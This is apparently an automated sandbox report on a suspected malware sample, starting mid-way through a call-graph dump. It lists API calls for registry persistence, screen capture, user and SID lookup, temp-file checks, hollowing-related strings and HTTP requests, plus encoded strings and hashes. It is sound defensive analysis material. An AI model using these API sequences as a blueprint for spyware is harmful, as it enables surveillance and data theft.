calls 29871 769a0d 29869->29871 29872 769467 29870->29872 29959 7643e0 29871->29959 29873 7661f0 114 API calls 29872->29873 29874 769472 29873->29874 29875 783030 70 API calls 29874->29875 29876 769494 29875->29876 29877 7661f0 114 API calls 29876->29877 29878 76949f GetModuleHandleA GetProcAddress 29877->29878 29880 7694c5 _Ref_count_obj 29878->29880 29881 769546 _Ref_count_obj 29880->29881 29882 769a14 29880->29882 29883 769577 GetSystemInfo 29881->29883 29884 769573 GetNativeSystemInfo 29881->29884 29885 78ea38 25 API calls 29882->29885 29888 76957d 29883->29888 29884->29888 29886 769a19 29885->29886 29887 78ea38 25 API calls 29886->29887 29889 769a1e 29887->29889 29890 7695df 29888->29890 29891 7696b9 29888->29891 29913 769588 _Ref_count_obj 29888->29913 29892 783030 70 API calls 29890->29892 29893 783030 70 API calls 
29891->29893 29894 769600 29892->29894 29895 7696e5 29893->29895 29896 7661f0 114 API calls 29894->29896 29897 7661f0 114 API calls 29895->29897 29898 769607 29896->29898 29899 7696ec 29897->29899 29900 783030 70 API calls 29898->29900 29901 783030 70 API calls 29899->29901 29903 76961f 29900->29903 29902 769704 29901->29902 29904 7661f0 114 API calls 29902->29904 29905 7661f0 114 API calls 29903->29905 29906 76970b 29904->29906 29908 769626 29905->29908 29907 783030 70 API calls 29906->29907 29910 76973c 29907->29910 30143 79189f 40 API calls 29908->30143 29912 7661f0 114 API calls 29910->29912 29911 769651 29911->29886 29911->29913 29914 769743 29912->29914 29913->29869 30144 7691b0 119 API calls 3 library calls 29914->30144 29916 769752 29917 783030 70 API calls 29916->29917 29918 76978d 29917->29918 29919 7661f0 114 API calls 29918->29919 29920 769794 29919->29920 29921 783030 70 API calls 29920->29921 29922 7697ac 29921->29922 29923 7661f0 114 API calls 29922->29923 29924 7697b3 29923->29924 29925 783030 70 API calls 29924->29925 29926 7697e4 29925->29926 29927 7661f0 114 API calls 29926->29927 29928 7697eb 29927->29928 30145 7691b0 119 API calls 3 library calls 29928->30145 29930 7697fa 29931 783030 70 API calls 29930->29931 29932 769835 29931->29932 29933 7661f0 114 API calls 29932->29933 29934 76983c 29933->29934 29935 783030 70 API calls 29934->29935 29936 769854 29935->29936 29937 7661f0 114 API calls 29936->29937 29938 76985b 29937->29938 29939 783030 70 API calls 29938->29939 29940 76988c 29939->29940 29941 7661f0 114 API calls 29940->29941 29942 769893 29941->29942 30146 7691b0 119 API calls 3 library calls 29942->30146 29944 7698a2 29945 783030 70 API calls 29944->29945 29946 7698dd 29945->29946 29947 7661f0 114 API calls 29946->29947 29948 7698e4 29947->29948 29949 783030 70 API calls 29948->29949 29950 7698fc 29949->29950 29951 7661f0 114 API calls 29950->29951 29952 769903 29951->29952 29953 783030 70 API calls 29952->29953 29954 769934 
29953->29954 29955 7661f0 114 API calls 29954->29955 29956 76993b 29955->29956 30147 7691b0 119 API calls 3 library calls 29956->30147 29958 76994a 29958->29913 29960 764404 29959->29960 29961 76447d 29960->29961 29962 783f40 27 API calls 29960->29962 29963 7896b0 _ValidateLocalCookies 5 API calls 29961->29963 29962->29961 29964 76448c 29963->29964 29965 769a20 29964->29965 29966 78b340 __fread_nolock 29965->29966 29967 769a85 GetVersionExW 29966->29967 29968 769aa3 29967->29968 29969 769aad 29967->29969 29971 7896b0 _ValidateLocalCookies 5 API calls 29968->29971 29970 783030 70 API calls 29969->29970 29972 769abc 29970->29972 29973 769c05 29971->29973 29974 7661f0 114 API calls 29972->29974 29973->29362 29975 769ac7 29974->29975 29976 783030 70 API calls 29975->29976 29977 769ae9 29976->29977 29978 7661f0 114 API calls 29977->29978 29979 769af4 29978->29979 29980 769aff GetModuleHandleA GetProcAddress 29979->29980 29981 769afd 29979->29981 29982 769b1a _Ref_count_obj 29980->29982 29981->29980 29983 769b97 _Ref_count_obj 29982->29983 29984 769c0c 29982->29984 29985 769bc8 GetSystemInfo 29983->29985 29987 769bc4 29983->29987 29986 78ea38 25 API calls 29984->29986 29985->29987 29988 769c11 29986->29988 29987->29968 29990 76b2e0 29989->29990 29990->29990 29991 76b331 29990->29991 29992 76b4ab 29990->29992 29998 76b2f4 _Yarn 29990->29998 30162 7853d0 27 API calls std::_Facet_Register 29991->30162 30163 7626a0 27 API calls 29992->30163 29994 76b4b0 29997 78ea38 25 API calls 29994->29997 29999 76b4b5 29997->29999 30148 782d00 29998->30148 30000 76b483 _Ref_count_obj 30001 7896b0 _ValidateLocalCookies 5 API calls 30000->30001 30003 76b4a7 30001->30003 30002 76b3e7 30002->29994 30002->30000 30004 76b700 30003->30004 30005 783030 70 API calls 30004->30005 30006 76b742 30005->30006 30007 7661f0 114 API calls 30006->30007 30008 76b74a 30007->30008 30168 76a270 GetTempPathA 30008->30168 30011 785430 27 API calls 30012 76b76f GetFileAttributesA 30011->30012 30016 76b788 
_Ref_count_obj 30012->30016 30013 76c689 30015 78ea38 25 API calls 30013->30015 30014 76b853 _Ref_count_obj 30017 76b861 30014->30017 30019 783030 70 API calls 30014->30019 30018 76c6c5 30015->30018 30016->30013 30016->30014 30021 783f40 27 API calls 30017->30021 30020 76b87c 30019->30020 30022 7661f0 114 API calls 30020->30022 30023 76c675 GetModuleFileNameA 30021->30023 30024 76b884 30022->30024 30023->29382 30025 76a270 115 API calls 30024->30025 30026 76b898 30025->30026 30027 785430 27 API calls 30026->30027 30028 76b8a9 GetFileAttributesA 30027->30028 30029 76b8c2 _Ref_count_obj 30028->30029 30029->30017 30030 783030 70 API calls 30029->30030 30031 76b9b6 30030->30031 30032 7661f0 114 API calls 30031->30032 30033 76b9be 30032->30033 30034 76a270 115 API calls 30033->30034 30035 76b9d2 30034->30035 30036 785430 27 API calls 30035->30036 30037 76b9e3 GetFileAttributesA 30036->30037 30038 76b9fc _Ref_count_obj 30037->30038 30038->30017 30039 783030 70 API calls 30038->30039 30040 76baf0 30039->30040 30041 7661f0 114 API calls 30040->30041 30042 76baf8 30041->30042 30043 76a270 115 API calls 30042->30043 30044 76bb0c 30043->30044 30045 785430 27 API calls 30044->30045 30046 76bb1d GetFileAttributesA 30045->30046 30048 76bb36 _Ref_count_obj 30046->30048 30047 783030 70 API calls 30049 76bc2a 30047->30049 30048->30017 30048->30047 30050 7661f0 114 API calls 30049->30050 30051 76bc32 30050->30051 30052 76a270 115 API calls 30051->30052 30053 76bc46 30052->30053 30054 785430 27 API calls 30053->30054 30055 76bc57 GetFileAttributesA 30054->30055 30057 76bc70 _Ref_count_obj 30055->30057 30056 783030 70 API calls 30058 76bd64 30056->30058 30057->30017 30057->30056 30059 7661f0 114 API calls 30058->30059 30060 76bd6c 30059->30060 30061 76a270 115 API calls 30060->30061 30062 76bd80 30061->30062 30063 785430 27 API calls 30062->30063 30064 76bd91 GetFileAttributesA 30063->30064 30066 76bdaa _Ref_count_obj 30064->30066 30065 783030 70 API calls 30067 76be9e 30065->30067 
30066->30017 30066->30065 30068 7661f0 114 API calls 30067->30068 30069 76bea6 30068->30069 30070 76a270 115 API calls 30069->30070 30071 76beba 30070->30071 30072 785430 27 API calls 30071->30072 30073 76becb GetFileAttributesA 30072->30073 30074 76bee4 _Ref_count_obj 30073->30074 30074->30017 30075 783030 70 API calls 30074->30075 30076 76bfd8 30075->30076 30077 7661f0 114 API calls 30076->30077 30078 76bfe0 30077->30078 30079 76a270 115 API calls 30078->30079 30080 76bff4 30079->30080 30081 785430 27 API calls 30080->30081 30082 76c005 GetFileAttributesA 30081->30082 30083 76c01e _Ref_count_obj 30082->30083 30083->30017 30084 783030 70 API calls 30083->30084 30085 76c112 30084->30085 30086 7661f0 114 API calls 30085->30086 30087 76c11a 30086->30087 30088 76a270 115 API calls 30087->30088 30089 76c12e 30088->30089 30090 785430 27 API calls 30089->30090 30091 76c13f GetFileAttributesA 30090->30091 30092 76c158 _Ref_count_obj 30091->30092 30092->30017 30093 783030 70 API calls 30092->30093 30094 76c24c 30093->30094 30095 7661f0 114 API calls 30094->30095 30096 76c254 30095->30096 30097 76a270 115 API calls 30096->30097 30098 76c268 30097->30098 30099 785430 27 API calls 30098->30099 30100 76c279 GetFileAttributesA 30099->30100 30101 76c292 _Ref_count_obj 30100->30101 30101->30017 30102 783030 70 API calls 30101->30102 30103 76c386 30102->30103 30104 7661f0 114 API calls 30103->30104 30105 76c38e 30104->30105 30106 76a270 115 API calls 30105->30106 30107 76c3a2 30106->30107 30108 785430 27 API calls 30107->30108 30109 76c3b3 GetFileAttributesA 30108->30109 30110 76c3cc _Ref_count_obj 30109->30110 30110->30017 30111 783030 70 API calls 30110->30111 30112 76c4c0 30111->30112 30113 7661f0 114 API calls 30112->30113 30114 76c4cb 30113->30114 30115 76a270 115 API calls 30114->30115 30116 76c4e2 30115->30116 30117 785430 27 API calls 30116->30117 30118 76c4f3 GetFileAttributesA 30117->30118 30119 76c50c _Ref_count_obj 30118->30119 30119->30017 30120 7693d0 124 API calls 
30119->30120 30121 76c61a 30120->30121 30121->30017 30122 7693d0 124 API calls 30121->30122 30123 76c624 30122->30123 30123->30017 30124 7693d0 124 API calls 30123->30124 30125 76c62e 30124->30125 30125->30017 30126 7693d0 124 API calls 30125->30126 30127 76c638 30126->30127 30127->30017 30128 7693d0 124 API calls 30127->30128 30128->30017 30130 769e46 30129->30130 30131 769e78 _Ref_count_obj 30130->30131 30133 769e93 30130->30133 30132 7896b0 _ValidateLocalCookies 5 API calls 30131->30132 30134 769e8f 30132->30134 30135 78ea38 25 API calls 30133->30135 30134->29387 30136 769e98 30135->30136 30137->29502 30138->29505 30139->29864 30142 769436 GetVersionExW 30141->30142 30142->29868 30142->29913 30143->29911 30144->29916 30145->29930 30146->29944 30147->29958 30150 782d1b 30148->30150 30161 782e04 _Yarn _Ref_count_obj 30148->30161 30149 782e91 30166 7626a0 27 API calls 30149->30166 30150->30149 30153 782d9b _Yarn 30150->30153 30154 782d8a 30150->30154 30155 782db1 30150->30155 30150->30161 30152 782e96 30167 7625c0 27 API calls 2 library calls 30152->30167 30160 78ea38 25 API calls 30153->30160 30153->30161 30154->30152 30164 7625c0 27 API calls 4 library calls 30154->30164 30155->30153 30165 7625c0 27 API calls 4 library calls 30155->30165 30157 782e9b 30160->30149 30161->30002 30162->29998 30164->30153 30165->30153 30167->30157 30169 783030 70 API calls 30168->30169 30170 76a2cc 30169->30170 30171 7661f0 114 API calls 30170->30171 30172 76a2d7 30171->30172 30173 783f40 27 API calls 30172->30173 30174 76a32d 30173->30174 30175 783f40 27 API calls 30174->30175 30176 76a389 30175->30176 30177 785430 27 API calls 30176->30177 30179 76a3a2 _Ref_count_obj 30177->30179 30178 76a465 30182 78ea38 25 API calls 30178->30182 30179->30178 30180 76a43e _Ref_count_obj 30179->30180 30181 7896b0 _ValidateLocalCookies 5 API calls 30180->30181 30183 76a461 30181->30183 30184 76a46a 30182->30184 30183->30011 30188 7808d0 30185->30188 30186 783030 70 API calls 30186->30188 30187 
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                        • RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                        • RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                        • RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                        • RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                        • RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                          • Part of subcall function 007661F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 007668E0
                                                                                                        • RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00766D5E
                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000,3F07E9DB,00000000), ref: 00766DEA
                                                                                                        • GetDC.USER32(00000000), ref: 00766F62
                                                                                                        • RegGetValueA.ADVAPI32(80000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007671CD
                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 00767226
                                                                                                        • GetSystemMetrics.USER32(00000000), ref: 0076722F
                                                                                                        • RegGetValueA.ADVAPI32(80000002,?,00000000), ref: 00767277
                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 007672CA
                                                                                                        • GetSystemMetrics.USER32(00000001), ref: 007672D3
                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 007672DF
                                                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 007672F4
                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00767304
                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0076732A
                                                                                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(00000000,00000000,?), ref: 0076733E
                                                                                                        • GdipGetImageEncodersSize.GDIPLUS(00000000,?), ref: 0076735A
                                                                                                        • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00767387
                                                                                                        • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 0076740E
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0076741B
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00767428
                                                                                                        • DeleteObject.GDI32(?), ref: 00767430
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0076743A
                                                                                                        • GdipDisposeImage.GDIPLUS(00000000), ref: 00767441
                                                                                                        • GdiplusShutdown.GDIPLUS(?), ref: 007674E3
                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 007675BA
                                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00767600
                                                                                                        • GetSidIdentifierAuthority.ADVAPI32(?), ref: 0076760D
                                                                                                        • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00767721
                                                                                                        • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00767748
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                                                                        • String ID: $($KQRwfI==$MQLwfI==$NBqAOvw1C0P=$NBqAOvw1CRb=$NBqAOvw1ChD=$NBqAOvw1Chz=$NtUnmapViewOfSection$VwQpdzQu$Wkbo1O5KHy==$YBqAOvw=$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                        • API String ID: 1729688432-2321920341
                                                                                                        • Opcode ID: dd8189179259eb1aad4fea967f964824a1669f2b4c3e3f7b43592c97a120dbfd
                                                                                                        • Instruction ID: 6caffc2fbd9c0ae271e5973c471ae4f11c218289b80c79f67c060eda60e8ed79
                                                                                                        • Opcode Fuzzy Hash: dd8189179259eb1aad4fea967f964824a1669f2b4c3e3f7b43592c97a120dbfd
                                                                                                        • Instruction Fuzzy Hash: 70D2F771A00118DBDF18DF64CC89BEDBB75EF45304F508298F806A7292EB399A94CF95
                                                                                                        APIs
                                                                                                          • Part of subcall function 007661F0: GetUserNameA.ADVAPI32(?,?), ref: 007675BA
                                                                                                          • Part of subcall function 007661F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00767600
                                                                                                          • Part of subcall function 007661F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0076760D
                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0077F142
                                                                                                        • RegCloseKey.KERNELBASE(80000002), ref: 0077F158
                                                                                                        • GetUserNameA.ADVAPI32(?,80000002), ref: 0077F1E2
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0077F26D
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                                                                        • String ID: 0EQ $246122658369$776334$OQUAOo==$System$V$ZVO $ZVy $Zka $bUG $c03 $c1C $cFO $d0G $dEC $dhQ=$eUU $elC
                                                                                                        • API String ID: 4106312383-465785502
                                                                                                        • Opcode ID: 03a8f0ac7ba156151931463cc7460eaed65dd642a2286fa40da9b28e05629296
                                                                                                        • Instruction ID: bf0ca363297cf504b46aef802c6d206643797790b277695301e0243bb95c35b9
                                                                                                        • Opcode Fuzzy Hash: 03a8f0ac7ba156151931463cc7460eaed65dd642a2286fa40da9b28e05629296
                                                                                                        • Instruction Fuzzy Hash: 87D2E471A001589BEB29E728CD897DDBB769B82304F5481D8E00DA72D7EB395FC48F91
                                                                                                        APIs
                                                                                                          • Part of subcall function 0076A270: GetTempPathA.KERNEL32(00000104,?,3F07E9DB,?,00000000), ref: 0076A2B7
                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0076B77B
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076B8B5
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076B9EF
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BB29
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BC63
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BD9D
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BED7
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C011
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                          • Part of subcall function 007661F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 007668E0
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C14B
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C285
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C3BF
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(?), ref: 00766D5E
                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0076C4FF
                                                                                                          • Part of subcall function 007693D0: GetVersionExW.KERNEL32(0000011C,3F07E9DB,74DF0F00), ref: 0076944A
                                                                                                          • Part of subcall function 007693D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007694AB
                                                                                                          • Part of subcall function 007693D0: GetProcAddress.KERNEL32(00000000), ref: 007694B2
                                                                                                          • Part of subcall function 007693D0: GetNativeSystemInfo.KERNELBASE(?), ref: 00769573
                                                                                                          • Part of subcall function 007693D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00769577
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                                                                        • String ID: R0ZxdUNw$RTPL$RVPteeA=$STDJXs==$UkZCfy5v$V0ZAcy5A
                                                                                                        • API String ID: 3951112935-690854277
                                                                                                        • Opcode ID: d57a20cc2001d6db0ab6966b4b0c037c3e1ed7d4a5b9f48589dd4ae0ae79c691
                                                                                                        • Instruction ID: 424fd20076c972596195b23cfda6694f937a2c0d10b38a125354d4603af154d7
                                                                                                        • Opcode Fuzzy Hash: d57a20cc2001d6db0ab6966b4b0c037c3e1ed7d4a5b9f48589dd4ae0ae79c691
                                                                                                        • Instruction Fuzzy Hash: B2923A71A00148DBDF09DBB8CD897EDBB71AF46310F648208E856A73D7E73D5A808B65

                                                                                                        Control-flow Graph
                                                                                                        • Graph rendering for function 0076E8D0 omitted (basic-block edge list not reproduced)
                                                                                                        APIs
                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 0076E91D
                                                                                                        • CoInitialize.OLE32(00000000), ref: 0076EC52
                                                                                                        • CoCreateInstance.OLE32(007BD064,00000000,00000001,007BD0C4,?), ref: 0076EC71
                                                                                                        • CoUninitialize.OLE32 ref: 0076EC7F
                                                                                                        • CoUninitialize.OLE32 ref: 0076F053
                                                                                                        • CoUninitialize.OLE32 ref: 0076F06A
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0076F16C
                                                                                                        • CoUninitialize.OLE32 ref: 0076F240
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Uninitialize$CreateInitializeInstanceLocalNameTimeUser
                                                                                                        • String ID: @3P$EOexNKWuBQR=$MQQRE9==$MQQxNKWu$VCZXXs==$bFH4evkwBu==$bFH4ezI7BwZ=
                                                                                                        • API String ID: 1302556198-549416660
                                                                                                        • Opcode ID: 445cf8398b6c121c237e3e38e12cb97d7a6d6a34a42f4215d95067d5b924b263
                                                                                                        • Instruction ID: 4bedb090576b02b59671ed5baefb5cb6c1480f3a2a48c12702cf40c55e535eb9
                                                                                                        • Opcode Fuzzy Hash: 445cf8398b6c121c237e3e38e12cb97d7a6d6a34a42f4215d95067d5b924b263
                                                                                                        • Instruction Fuzzy Hash: EB425B71A00218DFDB24DF64CC98BDEBBB5AF59304F5041D8E809A7291DB79AAC4CF91

                                                                                                        Control-flow Graph
                                                                                                        • Graph rendering for function 00770370 omitted (basic-block edge list not reproduced)
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000005DC,3F07E9DB,?,00000000), ref: 00770402
                                                                                                        • InternetOpenW.WININET(007BCC10,00000000,00000000,00000000,00000000), ref: 00770411
                                                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00770435
                                                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 0077047F
                                                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 0077053F
                                                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 007705F1
                                                                                                        • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 007706A0
                                                                                                        • InternetCloseHandle.WININET(?), ref: 007706C7
                                                                                                        • InternetCloseHandle.WININET(?), ref: 007706CF
                                                                                                        • InternetCloseHandle.WININET(?), ref: 007706D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmp
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmp
